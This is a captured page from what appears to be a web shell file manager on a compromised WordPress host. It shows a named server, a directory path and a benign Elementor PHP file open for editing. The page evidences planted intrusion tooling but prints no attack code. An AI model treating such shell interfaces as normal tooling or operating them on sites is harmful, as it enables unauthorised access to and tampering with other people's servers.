░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
vps.doorgans.com
LOCATION:
/home/fotosel/.trash/wp-content/plugins/elementor/core/admin/notices
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: base-notice.php
<?php namespace Elementor\Core\Admin\Notices; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } abstract class Base_Notice { /** * Determine if the notice should be printed or not. * * @return boolean */ abstract public function should_print(); /** * Returns the config of the notice itself. * based on that config the notice will be printed. * * @see \Elementor\Core\Admin\Admin_Notices::admin_notices * * @return array */ abstract public function get_config(); }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 base-notice.php
PHP
515 B
2022-06-09 15:28
EDIT
📄 elementor-dev-notice.php
PHP
4.2 KB
2022-06-09 15:28
EDIT
📄 update-php-notice.php
PHP
1.1 KB
2022-06-09 15:28
EDIT